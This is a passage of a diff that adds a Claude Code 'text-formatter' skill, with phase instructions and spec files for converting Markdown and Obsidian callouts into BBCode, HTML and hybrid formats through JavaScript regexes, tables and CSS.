done: { icon: '✅', color: '#4CAF50', label: '完成' },
|
||||
|
||||
// 警告类
|
||||
warning: { icon: '⚠️', color: '#FF9800', label: '警告' },
|
||||
caution: { icon: '⚠️', color: '#FF9800', label: '注意' },
|
||||
attention: { icon: '⚠️', color: '#FF9800', label: '注意' },
|
||||
question: { icon: '❓', color: '#FF9800', label: '问题' },
|
||||
help: { icon: '❓', color: '#FF9800', label: '帮助' },
|
||||
faq: { icon: '❓', color: '#FF9800', label: 'FAQ' },
|
||||
todo: { icon: '📋', color: '#FF9800', label: '待办' },
|
||||
|
||||
// 错误/危险类
|
||||
danger: { icon: '❌', color: '#F44336', label: '危险' },
|
||||
error: { icon: '❌', color: '#F44336', label: '错误' },
|
||||
bug: { icon: '🐛', color: '#F44336', label: 'Bug' },
|
||||
important: { icon: '⭐', color: '#F44336', label: '重要' },
|
||||
|
||||
// 其他
|
||||
example: { icon: '📋', color: '#9C27B0', label: '示例' },
|
||||
quote: { icon: '💬', color: 'gray', label: '引用' },
|
||||
cite: { icon: '💬', color: 'gray', label: '引用' }
|
||||
};
|
||||
|
||||
// Callout 检测正则 (支持 +/- 折叠标记)
|
||||
const CALLOUT_PATTERN = /^>\s*\[!(\w+)\][+-]?(?:\s+(.+))?$/;
|
||||
```
|
||||
|
||||
### Step 3: Callout 解析器
|
||||
|
||||
```javascript
|
||||
function parseCallouts(text) {
|
||||
const lines = text.split('\n');
|
||||
const result = [];
|
||||
let i = 0;
|
||||
|
||||
while (i < lines.length) {
|
||||
const match = lines[i].match(CALLOUT_PATTERN);
|
||||
if (match) {
|
||||
const type = match[1].toLowerCase();
|
||||
const title = match[2] || null;
|
||||
const content = [];
|
||||
i++;
|
||||
|
||||
// 收集 Callout 内容行
|
||||
while (i < lines.length && lines[i].startsWith('>')) {
|
||||
content.push(lines[i].replace(/^>\s*/, ''));
|
||||
i++;
|
||||
}
|
||||
|
||||
result.push({
|
||||
isCallout: true,
|
||||
type,
|
||||
title,
|
||||
content: content.join('\n')
|
||||
});
|
||||
} else {
|
||||
result.push({ isCallout: false, line: lines[i] });
|
||||
i++;
|
||||
}
|
||||
}
|
||||
|
||||
return result;
|
||||
}
|
||||
```
|
||||
|
||||
### Step 4: BBCode+MD 转换器
|
||||
|
||||
```javascript
|
||||
function formatBBCodeMD(text) {
|
||||
let result = text;
|
||||
|
||||
// ===== 标题转换 (像素级字号) =====
|
||||
result = result.replace(/^######\s*(.+)$/gm, '[b]$1[/b]');
|
||||
result = result.replace(/^#####\s*(.+)$/gm, '[b]$1[/b]');
|
||||
result = result.replace(/^####\s*(.+)$/gm, '[b]$1[/b]');
|
||||
result = result.replace(/^###\s*(.+)$/gm, '[size=100][color=#333][b]$1[/b][/color][/size]');
|
||||
result = result.replace(/^##\s*(.+)$/gm, '[size=120][color=#2196F3][b]$1[/b][/color][/size]');
|
||||
result = result.replace(/^#\s*(.+)$/gm, '[size=150][color=#2196F3][b]$1[/b][/color][/size]');
|
||||
|
||||
// ===== 文本样式 =====
|
||||
result = result.replace(/\*\*\*(.+?)\*\*\*/g, '[b][i]$1[/i][/b]');
|
||||
result = result.replace(/\*\*(.+?)\*\*/g, '[b]$1[/b]');
|
||||
result = result.replace(/__(.+?)__/g, '[b]$1[/b]');
|
||||
result = result.replace(/\*(.+?)\*/g, '[i]$1[/i]');
|
||||
result = result.replace(/_(.+?)_/g, '[i]$1[/i]');
|
||||
result = result.replace(/~~(.+?)~~/g, '[s]$1[/s]');
|
||||
result = result.replace(/==(.+?)==/g, '[color=yellow]$1[/color]');
|
||||
|
||||
// ===== HTML 转 BBCode =====
|
||||
result = result.replace(/<mark>(.+?)<\/mark>/g, '[color=yellow]$1[/color]');
|
||||
result = result.replace(/<u>(.+?)<\/u>/g, '[u]$1[/u]');
|
||||
result = result.replace(/<details>\s*<summary>(.+?)<\/summary>\s*([\s\S]*?)<\/details>/g,
|
||||
'[spoiler=$1]$2[/spoiler]');
|
||||
|
||||
// ===== 代码 =====
|
||||
result = result.replace(/```(\w*)\n([\s\S]*?)```/g, '[code]$2[/code]');
|
||||
// 行内代码保持原样 (部分论坛不支持 font=monospace)
|
||||
|
||||
// ===== 链接和图片 =====
|
||||
result = result.replace(/\[([^\]]+)\]\(([^)]+)\)/g, '[url=$2]$1[/url]');
|
||||
result = result.replace(/!\[([^\]]*)\]\(([^)]+)\)/g, '[img]$2[/img]');
|
||||
|
||||
// ===== 引用 (非 Callout) =====
|
||||
result = result.replace(/^>\s+(.+)$/gm, '[quote]$1[/quote]');
|
||||
|
||||
// ===== 列表 (使用 • 符号) =====
|
||||
result = result.replace(/^[-*+]\s+(.+)$/gm, '• $1');
|
||||
|
||||
// ===== 分隔线 (保持 Markdown 语法) =====
|
||||
// `---` 在混合格式中通常可用,不转换为 [hr]
|
||||
|
||||
return result.trim();
|
||||
}
|
||||
```
|
||||
|
||||
### Step 5: Callout 转换
|
||||
|
||||
```javascript
|
||||
function convertCallouts(text) {
|
||||
const parsed = parseCallouts(text);
|
||||
|
||||
return parsed.map(item => {
|
||||
if (item.isCallout) {
|
||||
const cfg = CALLOUT_CONFIG[item.type] || CALLOUT_CONFIG.note;
|
||||
const displayTitle = item.title || cfg.label;
|
||||
|
||||
// 使用 [quote] 包裹,标题使用 size=100
|
||||
return `[quote]
|
||||
[size=100][color=${cfg.color}][b]${cfg.icon} ${displayTitle}[/b][/color][/size]
|
||||
|
||||
${item.content}
|
||||
[/quote]`;
|
||||
}
|
||||
return item.line;
|
||||
}).join('\n');
|
||||
}
|
||||
```
|
||||
|
||||
### Step 6: 执行转换
|
||||
|
||||
```javascript
|
||||
// 1. 先处理 Callouts
|
||||
let formattedContent = convertCallouts(content);
|
||||
|
||||
// 2. 再进行通用 BBCode+MD 转换
|
||||
formattedContent = formatBBCodeMD(formattedContent);
|
||||
|
||||
// 3. 清理多余空行
|
||||
formattedContent = formattedContent.replace(/\n{3,}/g, '\n\n');
|
||||
```
|
||||
|
||||
### Step 7: 保存转换结果
|
||||
|
||||
```javascript
|
||||
const outputFile = 'output.bbcode.txt';
|
||||
Write(`${workDir}/${outputFile}`, formattedContent);
|
||||
|
||||
// 更新配置
|
||||
config.output_file = outputFile;
|
||||
config.formatted_content = formattedContent;
|
||||
Write(`${workDir}/input-config.json`, JSON.stringify(config, null, 2));
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `output.bbcode.txt`
|
||||
- **Format**: BBCode + Markdown 混合格式
|
||||
|
||||
## Quality Checklist
|
||||
|
||||
- [ ] 标题使用像素值 (150/120/100)
|
||||
- [ ] 未使用 `[align]` 标签
|
||||
- [ ] 未使用 `[hr]` 标签
|
||||
- [ ] 分隔线使用 `---`
|
||||
- [ ] Callout 正确转换为 [quote]
|
||||
- [ ] 颜色值使用 hex 格式
|
||||
- [ ] 内容完整无丢失
|
||||
|
||||
## Next Phase
|
||||
|
||||
→ [Phase 4: Output & Preview](04-output-preview.md)
|
||||
183
.claude/skills/text-formatter/phases/04-output-preview.md
Normal file
@@ -0,0 +1,183 @@
|
||||
# Phase 4: Output & Preview
|
||||
|
||||
输出最终结果并提供预览。
|
||||
|
||||
## Objective
|
||||
|
||||
- 保存格式化后的内容到文件
|
||||
- 提供预览功能
|
||||
- 显示转换统计信息
|
||||
|
||||
## Input
|
||||
|
||||
- 依赖: `input-config.json`, `output.*`
|
||||
- 配置: `{workDir}/input-config.json`
|
||||
|
||||
## Execution Steps
|
||||
|
||||
### Step 1: 加载结果
|
||||
|
||||
```javascript
|
||||
const config = JSON.parse(Read(`${workDir}/input-config.json`));
|
||||
const analysis = JSON.parse(Read(`${workDir}/analysis.json`));
|
||||
const outputFile = `${workDir}/${config.output_file}`;
|
||||
const formattedContent = Read(outputFile);
|
||||
```
|
||||
|
||||
### Step 2: 生成统计摘要
|
||||
|
||||
```javascript
|
||||
const summary = {
|
||||
input: {
|
||||
method: config.input_method,
|
||||
original_length: config.original_content.length,
|
||||
word_count: config.original_content.split(/\s+/).length
|
||||
},
|
||||
output: {
|
||||
format: config.target_format,
|
||||
file: outputFile,
|
||||
length: formattedContent.length
|
||||
},
|
||||
elements: analysis.stats,
|
||||
reading_time: analysis.semantics?.estimated_reading_time || 1
|
||||
};
|
||||
|
||||
console.log(`
|
||||
╔════════════════════════════════════════════════════════════════╗
|
||||
║ Text Formatter Summary ║
|
||||
╠════════════════════════════════════════════════════════════════╣
|
||||
║ Input: ${summary.input.word_count} words (${summary.input.original_length} chars)
|
||||
║ Output: ${summary.output.format} → ${summary.output.file}
|
||||
║ Elements Converted:
|
||||
║ • Headings: ${summary.elements.headings}
|
||||
║ • Paragraphs: ${summary.elements.paragraphs}
|
||||
║ • Lists: ${summary.elements.lists}
|
||||
║ • Code Blocks: ${summary.elements.code_blocks}
|
||||
║ • Links: ${summary.elements.links}
|
||||
║ Estimated Reading Time: ${summary.reading_time} min
|
||||
╚════════════════════════════════════════════════════════════════╝
|
||||
`);
|
||||
```
|
||||
|
||||
### Step 3: HTML 预览(如适用)
|
||||
|
||||
```javascript
|
||||
if (config.target_format === 'HTML') {
|
||||
// 生成完整 HTML 文件用于预览
|
||||
const previewHtml = `<!DOCTYPE html>
|
||||
<html lang="zh-CN">
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<title>Text Formatter Preview</title>
|
||||
<style>
|
||||
body {
|
||||
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
|
||||
line-height: 1.6;
|
||||
max-width: 800px;
|
||||
margin: 0 auto;
|
||||
padding: 2rem;
|
||||
background: #f5f5f5;
|
||||
}
|
||||
.content {
|
||||
background: white;
|
||||
padding: 2rem;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 2px 10px rgba(0,0,0,0.1);
|
||||
}
|
||||
h1, h2, h3, h4, h5, h6 { color: #333; margin-top: 1.5em; }
|
||||
code { background: #f0f0f0; padding: 2px 6px; border-radius: 3px; }
|
||||
pre { background: #282c34; color: #abb2bf; padding: 1rem; border-radius: 6px; overflow-x: auto; }
|
||||
pre code { background: none; padding: 0; }
|
||||
blockquote { border-left: 4px solid #ddd; margin: 0; padding-left: 1rem; color: #666; }
|
||||
a { color: #0066cc; }
|
||||
img { max-width: 100%; }
|
||||
hr { border: none; border-top: 1px solid #ddd; margin: 2rem 0; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="content">
|
||||
${formattedContent}
|
||||
</div>
|
||||
</body>
|
||||
</html>`;
|
||||
|
||||
Write(`${workDir}/preview.html`, previewHtml);
|
||||
|
||||
// 可选:在浏览器中打开预览
|
||||
// Bash(`start "${workDir}/preview.html"`); // Windows
|
||||
// Bash(`open "${workDir}/preview.html"`); // macOS
|
||||
}
|
||||
```
|
||||
|
||||
### Step 4: 显示输出内容
|
||||
|
||||
```javascript
|
||||
// 显示格式化后的内容
|
||||
console.log('\n=== Formatted Content ===\n');
|
||||
console.log(formattedContent);
|
||||
console.log('\n=========================\n');
|
||||
|
||||
// 提示用户
|
||||
console.log(`
|
||||
📁 Output saved to: ${outputFile}
|
||||
${config.target_format === 'HTML' ? '🌐 Preview available: ' + workDir + '/preview.html' : ''}
|
||||
|
||||
💡 Tips:
|
||||
- Copy the content above for immediate use
|
||||
- Or access the saved file at the path shown
|
||||
`);
|
||||
```
|
||||
|
||||
### Step 5: 询问后续操作
|
||||
|
||||
```javascript
|
||||
const nextAction = await AskUserQuestion({
|
||||
questions: [
|
||||
{
|
||||
question: "需要执行什么操作?",
|
||||
header: "后续操作",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "完成", description: "结束格式化流程" },
|
||||
{ label: "转换为其他格式", description: "选择另一种输出格式" },
|
||||
{ label: "重新编辑", description: "修改原始内容后重新格式化" }
|
||||
]
|
||||
}
|
||||
]
|
||||
});
|
||||
|
||||
if (nextAction["后续操作"] === "转换为其他格式") {
|
||||
// 返回 Phase 1 选择新格式
|
||||
console.log('请重新运行 /text-formatter 选择其他格式');
|
||||
}
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `output.{ext}` (最终输出)
|
||||
- **File**: `preview.html` (HTML 预览,仅 HTML 格式)
|
||||
- **Console**: 统计摘要和格式化内容
|
||||
|
||||
## Final Output Structure
|
||||
|
||||
```
|
||||
{workDir}/
|
||||
├── input-config.json # 配置信息
|
||||
├── analysis.json # 分析结果
|
||||
├── output.md # Markdown 输出(如选择)
|
||||
├── output.bbcode.txt # BBCode 输出(如选择)
|
||||
├── output.html # HTML 输出(如选择)
|
||||
└── preview.html # HTML 预览页面
|
||||
```
|
||||
|
||||
## Quality Checklist
|
||||
|
||||
- [ ] 输出文件已保存
|
||||
- [ ] 统计信息正确显示
|
||||
- [ ] 预览功能可用(HTML)
|
||||
- [ ] 用户可访问输出内容
|
||||
|
||||
## Completion
|
||||
|
||||
此为最终阶段,格式化流程完成。
|
||||
293
.claude/skills/text-formatter/specs/callout-types.md
Normal file
@@ -0,0 +1,293 @@
|
||||
# Callout Types
|
||||
|
||||
Obsidian 风格的 Callout/Admonition 类型定义和转换规则。
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| Phase 2 | 检测 Callout | Detection patterns |
|
||||
| Phase 3 | 格式转换 | Conversion rules |
|
||||
|
||||
---
|
||||
|
||||
## Callout 语法
|
||||
|
||||
### Obsidian 原生语法
|
||||
|
||||
```markdown
|
||||
> [!TYPE] 可选标题
|
||||
> 内容行1
|
||||
> 内容行2
|
||||
```
|
||||
|
||||
### 支持的类型
|
||||
|
||||
| Type | Alias | Icon | Color | 用途 |
|
||||
|------|-------|------|-------|------|
|
||||
| `note` | - | 📝 | blue | 普通提示 |
|
||||
| `info` | - | ℹ️ | blue | 信息说明 |
|
||||
| `tip` | `hint` | 💡 | green | 技巧提示 |
|
||||
| `success` | `check`, `done` | ✅ | green | 成功状态 |
|
||||
| `warning` | `caution`, `attention` | ⚠️ | orange | 警告信息 |
|
||||
| `danger` | `error` | ❌ | red | 危险/错误 |
|
||||
| `bug` | - | 🐛 | red | Bug 说明 |
|
||||
| `example` | - | 📋 | purple | 示例内容 |
|
||||
| `quote` | `cite` | 💬 | gray | 引用内容 |
|
||||
| `abstract` | `summary`, `tldr` | 📄 | cyan | 摘要 |
|
||||
| `question` | `help`, `faq` | ❓ | yellow | 问题/FAQ |
|
||||
| `todo` | - | 📌 | orange | 待办事项 |
|
||||
|
||||
---
|
||||
|
||||
## 检测 Pattern
|
||||
|
||||
```javascript
|
||||
// Callout 检测正则
|
||||
const CALLOUT_PATTERN = /^>\s*\[!(\w+)\](?:\s+(.+))?$/;
|
||||
|
||||
// 检测函数
|
||||
function detectCallout(line) {
|
||||
const match = line.match(CALLOUT_PATTERN);
|
||||
if (match) {
|
||||
return {
|
||||
type: match[1].toLowerCase(),
|
||||
title: match[2] || null
|
||||
};
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
||||
// 解析完整 Callout 块
|
||||
function parseCalloutBlock(lines, startIndex) {
|
||||
const firstLine = lines[startIndex];
|
||||
const calloutInfo = detectCallout(firstLine);
|
||||
|
||||
if (!calloutInfo) return null;
|
||||
|
||||
const content = [];
|
||||
let i = startIndex + 1;
|
||||
|
||||
while (i < lines.length && lines[i].startsWith('>')) {
|
||||
content.push(lines[i].replace(/^>\s*/, ''));
|
||||
i++;
|
||||
}
|
||||
|
||||
return {
|
||||
...calloutInfo,
|
||||
content: content.join('\n'),
|
||||
endIndex: i - 1
|
||||
};
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 转换规则
|
||||
|
||||
### BBCode 转换
|
||||
|
||||
```javascript
|
||||
const CALLOUT_BBCODE = {
|
||||
note: {
|
||||
icon: '📝',
|
||||
color: '#2196F3',
|
||||
label: '注意'
|
||||
},
|
||||
info: {
|
||||
icon: 'ℹ️',
|
||||
color: '#2196F3',
|
||||
label: '信息'
|
||||
},
|
||||
tip: {
|
||||
icon: '💡',
|
||||
color: '#4CAF50',
|
||||
label: '提示'
|
||||
},
|
||||
success: {
|
||||
icon: '✅',
|
||||
color: '#4CAF50',
|
||||
label: '成功'
|
||||
},
|
||||
warning: {
|
||||
icon: '⚠️',
|
||||
color: '#FF9800',
|
||||
label: '警告'
|
||||
},
|
||||
danger: {
|
||||
icon: '❌',
|
||||
color: '#F44336',
|
||||
label: '危险'
|
||||
},
|
||||
bug: {
|
||||
icon: '🐛',
|
||||
color: '#F44336',
|
||||
label: 'Bug'
|
||||
},
|
||||
example: {
|
||||
icon: '📋',
|
||||
color: '#9C27B0',
|
||||
label: '示例'
|
||||
},
|
||||
quote: {
|
||||
icon: '💬',
|
||||
color: '#9E9E9E',
|
||||
label: '引用'
|
||||
},
|
||||
question: {
|
||||
icon: '❓',
|
||||
color: '#FFEB3B',
|
||||
label: '问题'
|
||||
}
|
||||
};
|
||||
|
||||
function calloutToBBCode(type, title, content, style = 'forum') {
|
||||
const config = CALLOUT_BBCODE[type] || CALLOUT_BBCODE.note;
|
||||
const displayTitle = title || config.label;
|
||||
|
||||
if (style === 'compact') {
|
||||
return `[quote][b]${config.icon} ${displayTitle}[/b]
|
||||
${content}[/quote]`;
|
||||
}
|
||||
|
||||
// Forum style - more visual
|
||||
return `[quote]
|
||||
[color=${config.color}][size=4][b]${config.icon} ${displayTitle}[/b][/size][/color]
|
||||
|
||||
${content}
|
||||
[/quote]`;
|
||||
}
|
||||
```
|
||||
|
||||
### HTML 转换
|
||||
|
||||
```javascript
|
||||
function calloutToHTML(type, title, content) {
|
||||
const config = CALLOUT_BBCODE[type] || CALLOUT_BBCODE.note;
|
||||
const displayTitle = title || config.label;
|
||||
|
||||
return `<div class="callout callout-${type}">
|
||||
<div class="callout-title">
|
||||
<span class="callout-icon">${config.icon}</span>
|
||||
<span class="callout-title-text">${displayTitle}</span>
|
||||
</div>
|
||||
<div class="callout-content">
|
||||
${content}
|
||||
</div>
|
||||
</div>`;
|
||||
}
|
||||
```
|
||||
|
||||
### Hybrid 转换
|
||||
|
||||
```javascript
|
||||
function calloutToHybrid(type, title, content) {
|
||||
const config = CALLOUT_BBCODE[type] || CALLOUT_BBCODE.note;
|
||||
const displayTitle = title || config.label;
|
||||
|
||||
// HTML container + BBCode styling + MD content
|
||||
return `<div class="callout ${type}">
|
||||
|
||||
[color=${config.color}][b]${config.icon} ${displayTitle}[/b][/color]
|
||||
|
||||
${content}
|
||||
|
||||
</div>`;
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Callout CSS 样式
|
||||
|
||||
```css
|
||||
/* Base callout styles */
|
||||
.callout {
|
||||
padding: 1rem;
|
||||
margin: 1rem 0;
|
||||
border-left: 4px solid;
|
||||
border-radius: 4px;
|
||||
background: #f8f9fa;
|
||||
}
|
||||
|
||||
.callout-title {
|
||||
display: flex;
|
||||
align-items: center;
|
||||
gap: 0.5rem;
|
||||
font-weight: 600;
|
||||
margin-bottom: 0.5rem;
|
||||
}
|
||||
|
||||
.callout-icon {
|
||||
font-size: 1.2em;
|
||||
}
|
||||
|
||||
/* Type-specific colors */
|
||||
.callout-note, .callout-info {
|
||||
border-color: #2196F3;
|
||||
background: #E3F2FD;
|
||||
}
|
||||
|
||||
.callout-tip, .callout-success {
|
||||
border-color: #4CAF50;
|
||||
background: #E8F5E9;
|
||||
}
|
||||
|
||||
.callout-warning {
|
||||
border-color: #FF9800;
|
||||
background: #FFF3E0;
|
||||
}
|
||||
|
||||
.callout-danger, .callout-bug {
|
||||
border-color: #F44336;
|
||||
background: #FFEBEE;
|
||||
}
|
||||
|
||||
.callout-example {
|
||||
border-color: #9C27B0;
|
||||
background: #F3E5F5;
|
||||
}
|
||||
|
||||
.callout-quote {
|
||||
border-color: #9E9E9E;
|
||||
background: #FAFAFA;
|
||||
}
|
||||
|
||||
.callout-question {
|
||||
border-color: #FFC107;
|
||||
background: #FFFDE7;
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 折叠 Callout
|
||||
|
||||
支持可折叠的 Callout 语法:
|
||||
|
||||
```markdown
|
||||
> [!NOTE]+ 默认展开
|
||||
> 内容
|
||||
|
||||
> [!NOTE]- 默认折叠
|
||||
> 内容
|
||||
```
|
||||
|
||||
### BBCode 折叠
|
||||
|
||||
```bbcode
|
||||
[collapse=📝 注意]
|
||||
内容
|
||||
[/collapse]
|
||||
```
|
||||
|
||||
### HTML 折叠
|
||||
|
||||
```html
|
||||
<details class="callout callout-note">
|
||||
<summary>📝 注意</summary>
|
||||
<div class="callout-content">
|
||||
内容
|
||||
</div>
|
||||
</details>
|
||||
```
|
||||
226
.claude/skills/text-formatter/specs/element-mapping.md
Normal file
@@ -0,0 +1,226 @@
|
||||
# Element Mapping
|
||||
|
||||
内容元素到 BBCode + Markdown 混合格式的映射表。
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| Phase 2 | 元素识别 | Detection patterns |
|
||||
| Phase 3 | 格式转换 | Conversion rules |
|
||||
|
||||
---
|
||||
|
||||
## Element Detection Patterns
|
||||
|
||||
### 标题检测
|
||||
|
||||
| 类型 | Pattern | 示例 |
|
||||
|------|---------|------|
|
||||
| ATX 标题 | `/^#{1,6}\s+(.+)$/` | `# Title`, `## Subtitle` |
|
||||
| Setext H1 | `/^(.+)\n={3,}$/` | `Title\n====` |
|
||||
| Setext H2 | `/^(.+)\n-{3,}$/` | `Subtitle\n----` |
|
||||
|
||||
### 列表检测
|
||||
|
||||
| 类型 | Pattern | 示例 |
|
||||
|------|---------|------|
|
||||
| 无序列表 | `/^[\s]*[-*+]\s+(.+)$/` | `- item`, `* item` |
|
||||
| 有序列表 | `/^[\s]*\d+\.\s+(.+)$/` | `1. item`, `2. item` |
|
||||
| 任务列表 | `/^[\s]*[-*]\s+\[([ x])\]\s+(.+)$/` | `- [ ] todo`, `- [x] done` |
|
||||
|
||||
### Callout 检测
|
||||
|
||||
| 类型 | Pattern | 示例 |
|
||||
|------|---------|------|
|
||||
| Callout 开始 | `/^>\s*\[!(\w+)\](?:\s+(.+))?$/` | `> [!NOTE] 标题` |
|
||||
| Callout 内容 | `/^>\s*(.*)$/` | `> 内容行` |
|
||||
| 可折叠展开 | `/^>\s*\[!(\w+)\]\+/` | `> [!NOTE]+` |
|
||||
| 可折叠收起 | `/^>\s*\[!(\w+)\]-/` | `> [!NOTE]-` |
|
||||
|
||||
### 代码检测
|
||||
|
||||
| 类型 | Pattern | 示例 |
|
||||
|------|---------|------|
|
||||
| 代码块开始 | `/^```(\w*)$/` | ` ```js ` |
|
||||
| 代码块结束 | `/^```$/` | ` ``` ` |
|
||||
| 行内代码 | `/`([^`]+)`/` | `` `code` `` |
|
||||
|
||||
### 其他元素
|
||||
|
||||
| 类型 | Pattern | 示例 |
|
||||
|------|---------|------|
|
||||
| 链接 | `/\[([^\]]+)\]\(([^)]+)\)/` | `[text](url)` |
|
||||
| 图片 | `/!\[([^\]]*)\]\(([^)]+)\)/` | `` |
|
||||
| 普通引用 | `/^>\s+(.+)$/` | `> quote` |
|
||||
| 分隔线 | `/^[-*_]{3,}$/` | `---`, `***` |
|
||||
| 高亮 | `/==(.+?)==/` | `==highlight==` |
|
||||
| 粗体 | `/\*\*(.+?)\*\*/` | `**bold**` |
|
||||
| 斜体 | `/\*(.+?)\*/` | `*italic*` |
|
||||
| 删除线 | `/~~(.+?)~~/` | `~~strike~~` |
|
||||
|
||||
### HTML 元素检测
|
||||
|
||||
| 类型 | Pattern | 示例 |
|
||||
|------|---------|------|
|
||||
| 高亮 | `/<mark>(.+?)<\/mark>/` | `<mark>高亮</mark>` |
|
||||
| 折叠块 | `/<details>\s*<summary>(.+?)<\/summary>([\s\S]*?)<\/details>/` | `<details><summary>标题</summary>内容</details>` |
|
||||
| 下划线 | `/<u>(.+?)<\/u>/` | `<u>下划线</u>` |
|
||||
|
||||
---
|
||||
|
||||
## Element Conversion Matrix
|
||||
|
||||
### 标题映射 (Pixel-Based)
|
||||
|
||||
| Element | Markdown | BBCode Output |
|
||||
|---------|----------|---------------|
|
||||
| **H1** | `# text` | `[size=150][color=#2196F3][b]text[/b][/color][/size]` |
|
||||
| **H2** | `## text` | `[size=120][color=#2196F3][b]text[/b][/color][/size]` |
|
||||
| **H3** | `### text` | `[size=100][color=#333][b]text[/b][/color][/size]` |
|
||||
| **H4** | `#### text` | `[b]text[/b]` |
|
||||
| **H5** | `##### text` | `[b]text[/b]` |
|
||||
| **H6** | `###### text` | `[b]text[/b]` |
|
||||
|
||||
### 文本样式映射
|
||||
|
||||
| Element | Markdown/HTML | BBCode |
|
||||
|---------|---------------|--------|
|
||||
| **Bold** | `**text**` 或 `__text__` | `[b]text[/b]` |
|
||||
| **Italic** | `*text*` 或 `_text_` | `[i]text[/i]` |
|
||||
| **Bold+Italic** | `***text***` | `[b][i]text[/i][/b]` |
|
||||
| **Strike** | `~~text~~` | `[s]text[/s]` |
|
||||
| **Underline** | `<u>text</u>` | `[u]text[/u]` |
|
||||
| **Highlight** | `==text==` 或 `<mark>text</mark>` | `[color=yellow]text[/color]` |
|
||||
| **Code (inline)** | `` `text` `` | 保持原样 |
|
||||
|
||||
### HTML 转 BBCode 映射
|
||||
|
||||
| HTML | BBCode |
|
||||
|------|--------|
|
||||
| `<mark>text</mark>` | `[color=yellow]text[/color]` |
|
||||
| `<u>text</u>` | `[u]text[/u]` |
|
||||
| `<details><summary>标题</summary>内容</details>` | `[spoiler=标题]内容[/spoiler]` |
|
||||
|
||||
### 块级元素映射
|
||||
|
||||
| Element | Markdown | BBCode |
|
||||
|---------|----------|--------|
|
||||
| **Code Block** | ` ```lang\ncode\n``` ` | `[code]code[/code]` |
|
||||
| **Quote** | `> text` | `[quote]text[/quote]` |
|
||||
| **HR** | `---` | `---` (保持 Markdown) |
|
||||
| **List Item** | `- text` | `• text` |
|
||||
| **Paragraph** | `text\n\ntext` | `text\n\ntext` |
|
||||
|
||||
### 链接和媒体映射
|
||||
|
||||
| Element | Markdown | BBCode |
|
||||
|---------|----------|--------|
|
||||
| **Link** | `[text](url)` | `[url=url]text[/url]` |
|
||||
| **Image** | `` | `[img]url[/img]` |
|
||||
|
||||
---
|
||||
|
||||
## Callout Mapping
|
||||
|
||||
### 类型到样式映射
|
||||
|
||||
| Callout Type | Color | Icon | Label |
|
||||
|--------------|-------|------|-------|
|
||||
| note | #2196F3 | 📝 | 注意 |
|
||||
| info | #2196F3 | ℹ️ | 信息 |
|
||||
| tip | #4CAF50 | 💡 | 提示 |
|
||||
| hint | #4CAF50 | 💡 | 提示 |
|
||||
| success | #4CAF50 | ✅ | 成功 |
|
||||
| check | #4CAF50 | ✅ | 完成 |
|
||||
| done | #4CAF50 | ✅ | 完成 |
|
||||
| warning | #FF9800 | ⚠️ | 警告 |
|
||||
| caution | #FF9800 | ⚠️ | 注意 |
|
||||
| attention | #FF9800 | ⚠️ | 注意 |
|
||||
| danger | #F44336 | ❌ | 危险 |
|
||||
| error | #F44336 | ❌ | 错误 |
|
||||
| bug | #F44336 | 🐛 | Bug |
|
||||
| example | #9C27B0 | 📋 | 示例 |
|
||||
| question | #FF9800 | ❓ | 问题 |
|
||||
| help | #FF9800 | ❓ | 帮助 |
|
||||
| faq | #FF9800 | ❓ | FAQ |
|
||||
| quote | gray | 💬 | 引用 |
|
||||
| cite | gray | 💬 | 引用 |
|
||||
| abstract | #2196F3 | 📄 | 摘要 |
|
||||
| summary | #2196F3 | 📄 | 摘要 |
|
||||
| tldr | #2196F3 | 📄 | 摘要 |
|
||||
| todo | #FF9800 | 📋 | 待办 |
|
||||
| important | #F44336 | ⭐ | 重要 |
|
||||
|
||||
### Callout 输出模板
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color={color}][b]{icon} {title}[/b][/color][/size]
|
||||
|
||||
{content}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Unsupported Elements
|
||||
|
||||
### 不支持转换的元素
|
||||
|
||||
| 元素 | 原因 | 降级方案 |
|
||||
|------|------|----------|
|
||||
| 表格 | BBCode 表格支持有限 | 转为代码块或列表 |
|
||||
| 脚注 | 不支持 | 转为括号注释 `(注: ...)` |
|
||||
| 数学公式 | 不支持 | 保留原始文本 |
|
||||
| 嵌入内容 | 不支持 | 转为链接 |
|
||||
| 任务列表 | 复选框不支持 | 转为普通列表 `☐`/`☑` |
|
||||
|
||||
### 降级示例
|
||||
|
||||
**表格**:
|
||||
```
|
||||
| A | B |
|
||||
|---|---|
|
||||
| 1 | 2 |
|
||||
|
||||
→ 降级为:
|
||||
|
||||
A: 1
|
||||
B: 2
|
||||
```
|
||||
|
||||
**脚注**:
|
||||
```
|
||||
文本[^1]
|
||||
|
||||
[^1]: 脚注内容
|
||||
|
||||
→ 降级为:
|
||||
|
||||
文本 (注: 脚注内容)
|
||||
```
|
||||
|
||||
**任务列表**:
|
||||
```
|
||||
- [ ] 待办
|
||||
- [x] 已完成
|
||||
|
||||
→ 降级为:
|
||||
|
||||
☐ 待办
|
||||
☑ 已完成
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Validation Rules
|
||||
|
||||
### 转换验证
|
||||
|
||||
- [ ] 所有 H1-H3 使用像素值 size (150/120/100)
|
||||
- [ ] 未使用 `[align]` 标签
|
||||
- [ ] 未使用 `[hr]` 标签
|
||||
- [ ] 分隔线保持 `---`
|
||||
- [ ] Callout 正确识别并转换
|
||||
- [ ] 颜色值使用 hex 格式
|
||||
273
.claude/skills/text-formatter/specs/format-rules.md
Normal file
@@ -0,0 +1,273 @@
|
||||
# Format Conversion Rules
